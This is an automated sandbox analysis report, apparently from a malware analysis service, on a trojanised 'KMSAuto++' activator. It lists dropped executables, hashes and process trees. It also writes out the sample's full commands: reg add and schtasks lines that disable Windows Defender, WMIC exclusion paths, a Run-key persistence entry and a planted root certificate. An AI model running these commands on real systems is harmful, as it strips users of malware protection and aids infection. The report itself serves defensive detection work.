Analysis
-
max time kernel
152s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-es -
resource tags
arch:x64arch:x86image:win10v2004-20220812-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
06-02-2023 17:00
Static task
static1
Behavioral task
behavioral1
Sample
KMSAuto++v1.6.4.exe
Resource
win7-20221111-es
Behavioral task
behavioral2
Sample
KMSAuto++v1.6.4.exe
Resource
win10v2004-20220812-es
General
-
Target
KMSAuto++v1.6.4.exe
-
Size
718.9MB
-
MD5
ef8cd375fdc780a87dbf601860994ab9
-
SHA1
b0aac6fb4006091219ba82a5838e810e0e27beba
-
SHA256
a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520
-
SHA512
52db73a1bc0df076f74ed5fcb4d50ca7e46de6b7ee57cb7ee0223c96635dd01e4cafa403079fdeac25a219d402f5fdca608f76c8ed689540cac0d6c11b44c417
-
SSDEEP
786432:yo0mvb9vOggaeuNz9jMWZZ7vHMH85G1p14NPlT2sp:yavx2ggaL11MccpyPR2
Malware Config
Signatures
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
KMSAuto++v1.6.4.exemicrosoft tap driver.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation KMSAuto++v1.6.4.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation microsoft tap driver.exe -
Executes dropped EXE 5 IoCs
Processes:
kms driver.exekmsauto++v1.6.4.exemicrosoft tap driver.exesvchost32.exesigntool.exepid process 1504 kms driver.exe 1980 kmsauto++v1.6.4.exe 1988 microsoft tap driver.exe 4500 svchost32.exe 4004 signtool.exe -
Processes:
resource yara_rule C:\Users\Admin\kmsauto++v1.6.4.exe upx C:\Users\Admin\kmsauto++v1.6.4.exe upx C:\Users\Admin\microsoft tap driver.exe upx behavioral2/memory/1988-145-0x0000000000400000-0x000000000041F000-memory.dmp upx C:\Users\Admin\microsoft tap driver.exe upx behavioral2/memory/1980-155-0x0000000000400000-0x0000000001713000-memory.dmp upx behavioral2/memory/1988-200-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/1980-201-0x0000000000400000-0x0000000001713000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
svchost32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce svchost32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchost32.exe = "C:\\Users\\Admin\\svchost32.exe" svchost32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
KMSAuto++v1.6.4.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ KMSAuto++v1.6.4.exe -
Processes:
signtool.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C signtool.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf5c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 signtool.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
svchost32.exepid process 4500 svchost32.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
kms driver.exepid process 1504 kms driver.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
kms driver.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1504 kms driver.exe Token: SeIncreaseQuotaPrivilege 2036 WMIC.exe Token: SeSecurityPrivilege 2036 WMIC.exe Token: SeTakeOwnershipPrivilege 2036 WMIC.exe Token: SeLoadDriverPrivilege 2036 WMIC.exe Token: SeSystemProfilePrivilege 2036 WMIC.exe Token: SeSystemtimePrivilege 2036 WMIC.exe Token: SeProfSingleProcessPrivilege 2036 WMIC.exe Token: SeIncBasePriorityPrivilege 2036 WMIC.exe Token: SeCreatePagefilePrivilege 2036 WMIC.exe Token: SeBackupPrivilege 2036 WMIC.exe Token: SeRestorePrivilege 2036 WMIC.exe Token: SeShutdownPrivilege 2036 WMIC.exe Token: SeDebugPrivilege 2036 WMIC.exe Token: SeSystemEnvironmentPrivilege 2036 WMIC.exe Token: SeRemoteShutdownPrivilege 2036 WMIC.exe Token: SeUndockPrivilege 2036 WMIC.exe Token: SeManageVolumePrivilege 2036 WMIC.exe Token: 33 2036 WMIC.exe Token: 34 2036 WMIC.exe Token: 35 2036 WMIC.exe Token: 36 2036 WMIC.exe Token: SeIncreaseQuotaPrivilege 2036 WMIC.exe Token: SeSecurityPrivilege 2036 WMIC.exe Token: SeTakeOwnershipPrivilege 2036 WMIC.exe Token: SeLoadDriverPrivilege 2036 WMIC.exe Token: SeSystemProfilePrivilege 2036 WMIC.exe Token: SeSystemtimePrivilege 2036 WMIC.exe Token: SeProfSingleProcessPrivilege 2036 WMIC.exe Token: SeIncBasePriorityPrivilege 2036 WMIC.exe Token: SeCreatePagefilePrivilege 2036 WMIC.exe Token: SeBackupPrivilege 2036 WMIC.exe Token: SeRestorePrivilege 2036 WMIC.exe Token: SeShutdownPrivilege 2036 WMIC.exe Token: SeDebugPrivilege 2036 WMIC.exe Token: SeSystemEnvironmentPrivilege 2036 WMIC.exe Token: SeRemoteShutdownPrivilege 2036 WMIC.exe Token: SeUndockPrivilege 2036 WMIC.exe Token: SeManageVolumePrivilege 2036 WMIC.exe Token: 33 2036 WMIC.exe Token: 34 2036 WMIC.exe Token: 35 2036 WMIC.exe Token: 36 2036 WMIC.exe Token: SeIncreaseQuotaPrivilege 1660 WMIC.exe Token: SeSecurityPrivilege 1660 WMIC.exe Token: SeTakeOwnershipPrivilege 1660 WMIC.exe Token: SeLoadDriverPrivilege 1660 WMIC.exe Token: SeSystemProfilePrivilege 1660 WMIC.exe Token: SeSystemtimePrivilege 1660 WMIC.exe Token: SeProfSingleProcessPrivilege 1660 WMIC.exe Token: SeIncBasePriorityPrivilege 1660 WMIC.exe Token: SeCreatePagefilePrivilege 1660 WMIC.exe Token: SeBackupPrivilege 1660 WMIC.exe Token: SeRestorePrivilege 1660 WMIC.exe Token: SeShutdownPrivilege 1660 WMIC.exe Token: SeDebugPrivilege 1660 WMIC.exe Token: SeSystemEnvironmentPrivilege 1660 WMIC.exe Token: SeRemoteShutdownPrivilege 1660 WMIC.exe Token: SeUndockPrivilege 1660 WMIC.exe Token: SeManageVolumePrivilege 1660 WMIC.exe Token: 33 1660 WMIC.exe Token: 34 1660 WMIC.exe Token: 35 1660 WMIC.exe Token: 36 1660 WMIC.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
kmsauto++v1.6.4.exemicrosoft tap driver.exesigntool.exepid process 1980 kmsauto++v1.6.4.exe 1988 microsoft tap driver.exe 4004 signtool.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
KMSAuto++v1.6.4.exekmsauto++v1.6.4.exemicrosoft tap driver.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4472 wrote to memory of 1504 4472 KMSAuto++v1.6.4.exe kms driver.exe PID 4472 wrote to memory of 1504 4472 KMSAuto++v1.6.4.exe kms driver.exe PID 4472 wrote to memory of 1980 4472 KMSAuto++v1.6.4.exe kmsauto++v1.6.4.exe PID 4472 wrote to memory of 1980 4472 KMSAuto++v1.6.4.exe kmsauto++v1.6.4.exe PID 4472 wrote to memory of 1980 4472 KMSAuto++v1.6.4.exe kmsauto++v1.6.4.exe PID 4472 wrote to memory of 1988 4472 KMSAuto++v1.6.4.exe microsoft tap driver.exe PID 4472 wrote to memory of 1988 4472 KMSAuto++v1.6.4.exe microsoft tap driver.exe PID 4472 wrote to memory of 1988 4472 KMSAuto++v1.6.4.exe microsoft tap driver.exe PID 1980 wrote to memory of 4908 1980 kmsauto++v1.6.4.exe cmd.exe PID 1980 wrote to memory of 4908 1980 kmsauto++v1.6.4.exe cmd.exe PID 1980 wrote to memory of 4904 1980 kmsauto++v1.6.4.exe cmd.exe PID 1980 wrote to memory of 4904 1980 kmsauto++v1.6.4.exe cmd.exe PID 4472 wrote to memory of 4500 4472 KMSAuto++v1.6.4.exe svchost32.exe PID 4472 wrote to memory of 4500 4472 KMSAuto++v1.6.4.exe svchost32.exe PID 4472 wrote to memory of 4500 4472 KMSAuto++v1.6.4.exe svchost32.exe PID 1988 wrote to memory of 2780 1988 microsoft tap driver.exe cmd.exe PID 1988 wrote to memory of 2780 1988 microsoft tap driver.exe cmd.exe PID 1980 wrote to memory of 4004 1980 kmsauto++v1.6.4.exe signtool.exe PID 1980 wrote to memory of 4004 1980 kmsauto++v1.6.4.exe signtool.exe PID 1980 wrote to memory of 4004 1980 kmsauto++v1.6.4.exe signtool.exe PID 4904 wrote to memory of 2036 4904 cmd.exe WMIC.exe PID 4904 wrote to memory of 2036 4904 cmd.exe WMIC.exe PID 2780 wrote to memory of 3540 2780 cmd.exe reg.exe PID 2780 wrote to memory of 3540 2780 cmd.exe reg.exe PID 1980 wrote to memory of 4360 1980 kmsauto++v1.6.4.exe cmd.exe PID 1980 wrote to memory of 4360 1980 kmsauto++v1.6.4.exe cmd.exe PID 2780 wrote to memory of 3264 2780 cmd.exe reg.exe PID 2780 wrote to memory of 3264 2780 cmd.exe reg.exe PID 4360 wrote to memory of 1660 4360 cmd.exe WMIC.exe PID 4360 wrote to memory of 1660 4360 cmd.exe WMIC.exe PID 2780 wrote to memory of 3612 2780 cmd.exe reg.exe PID 2780 wrote to memory of 3612 2780 cmd.exe reg.exe PID 1980 wrote to memory of 1932 1980 kmsauto++v1.6.4.exe cmd.exe PID 1980 wrote to memory of 1932 1980 kmsauto++v1.6.4.exe cmd.exe PID 2780 wrote to memory of 3804 2780 cmd.exe reg.exe PID 2780 wrote to memory of 3804 2780 cmd.exe reg.exe PID 2780 wrote to memory of 1096 2780 cmd.exe reg.exe PID 2780 wrote to memory of 1096 2780 cmd.exe reg.exe PID 1932 wrote to memory of 2836 1932 cmd.exe WMIC.exe PID 1932 wrote to memory of 2836 1932 cmd.exe WMIC.exe PID 2780 wrote to memory of 3056 2780 cmd.exe reg.exe PID 2780 wrote to memory of 3056 2780 cmd.exe reg.exe PID 2780 wrote to memory of 1028 2780 cmd.exe reg.exe PID 2780 wrote to memory of 1028 2780 cmd.exe reg.exe PID 2780 wrote to memory of 992 2780 cmd.exe reg.exe PID 2780 wrote to memory of 992 2780 cmd.exe reg.exe PID 2780 wrote to memory of 2500 2780 cmd.exe reg.exe PID 2780 wrote to memory of 2500 2780 cmd.exe reg.exe PID 1980 wrote to memory of 2376 1980 kmsauto++v1.6.4.exe cmd.exe PID 1980 wrote to memory of 2376 1980 kmsauto++v1.6.4.exe cmd.exe PID 2780 wrote to memory of 4196 2780 cmd.exe reg.exe PID 2780 wrote to memory of 4196 2780 cmd.exe reg.exe PID 2780 wrote to memory of 4828 2780 cmd.exe reg.exe PID 2780 wrote to memory of 4828 2780 cmd.exe reg.exe PID 2780 wrote to memory of 5100 2780 cmd.exe reg.exe PID 2780 wrote to memory of 5100 2780 cmd.exe reg.exe PID 2376 wrote to memory of 4372 2376 cmd.exe WMIC.exe PID 2376 wrote to memory of 4372 2376 cmd.exe WMIC.exe PID 2780 wrote to memory of 3064 2780 cmd.exe reg.exe PID 2780 wrote to memory of 3064 2780 cmd.exe reg.exe PID 2780 wrote to memory of 2812 2780 cmd.exe reg.exe PID 2780 wrote to memory of 2812 2780 cmd.exe reg.exe PID 2780 wrote to memory of 1624 2780 cmd.exe schtasks.exe PID 2780 wrote to memory of 1624 2780 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\kms driver.exe"C:\Users\Admin\kms driver.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\kmsauto++v1.6.4.exe"C:\Users\Admin\kmsauto++v1.6.4.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSAuto "C:\Users\Admin\AppData\Local\Temp\KMSAuto.tmp" /Y3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\kmsauto++v1.6.4.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\kmsauto++v1.6.4.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\signtool.exe"C:\Users\Admin\AppData\Local\Temp\signtool.exe" verify /v /ph /sha1 648384a4dee53d4c1c87e10d67cc99307ccc9c98 "C:\Users\Admin\kmsauto++v1.6.4.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\KMSAuto_Files"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\KMSAuto_Files"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjPatcher.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjPatcher.exe"4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjHook.dll"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjHook.dll"4⤵
-
C:\Users\Admin\microsoft tap driver.exe"C:\Users\Admin\microsoft tap driver.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AAEB.tmp\AAEC.tmp\AAED.bat "C:\Users\Admin\microsoft tap driver.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
-
C:\Users\Admin\svchost32.exe"C:\Users\Admin\svchost32.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\AAEB.tmp\AAEC.tmp\AAED.batFilesize
3KB
MD53a981c51aac5475414f6dea9f4e6ae1a
SHA190fb6d188c3a6a04f9294fabc71f62635f0c3ea6
SHA256f6498b247cc03e1599bb19fc49dabb923b675bdfb0fd2348f78861842624f809
SHA512a8b49ee8606681f5559d3edddf1708df86f33b9029f140030037d4d2dff40bd288e0c69096be0ead4da4019c0ca5efcf81a33c7405bc82040fe833bb473f0e0b
-
C:\Users\Admin\AppData\Local\Temp\signtool.exeFilesize
323KB
MD505624e6d27eaef0db0673ae627bd6027
SHA1b155c76bf59992a8d75d0e3a59dc94f24aff2591
SHA256962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313
SHA512233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31
-
C:\Users\Admin\AppData\Local\Temp\signtool.exeFilesize
323KB
MD505624e6d27eaef0db0673ae627bd6027
SHA1b155c76bf59992a8d75d0e3a59dc94f24aff2591
SHA256962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313
SHA512233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31
-
C:\Users\Admin\kms driver.exeFilesize
46KB
MD55f3f77593b1a5bc4e96257a38a8666b1
SHA1532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
SHA2561b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
SHA51259b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
-
C:\Users\Admin\kms driver.exeFilesize
46KB
MD55f3f77593b1a5bc4e96257a38a8666b1
SHA1532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
SHA2561b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
SHA51259b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
-
C:\Users\Admin\kmsauto++v1.6.4.exeFilesize
17.2MB
MD5f047284bfddc942292d93ed86fdb20fd
SHA156dc945674cf4f941cf17a9ac9c1c9718cf9d18e
SHA256793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
SHA5122ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
-
C:\Users\Admin\kmsauto++v1.6.4.exeFilesize
17.2MB
MD5f047284bfddc942292d93ed86fdb20fd
SHA156dc945674cf4f941cf17a9ac9c1c9718cf9d18e
SHA256793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
SHA5122ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
-
C:\Users\Admin\microsoft tap driver.exeFilesize
59KB
MD5e0b6a8a56069214d6dc31a2c053f73f7
SHA13eb13ab2e49014437c904f8ada2d22a85fd503e4
SHA2564318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9
SHA512080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68
-
C:\Users\Admin\microsoft tap driver.exeFilesize
59KB
MD5e0b6a8a56069214d6dc31a2c053f73f7
SHA13eb13ab2e49014437c904f8ada2d22a85fd503e4
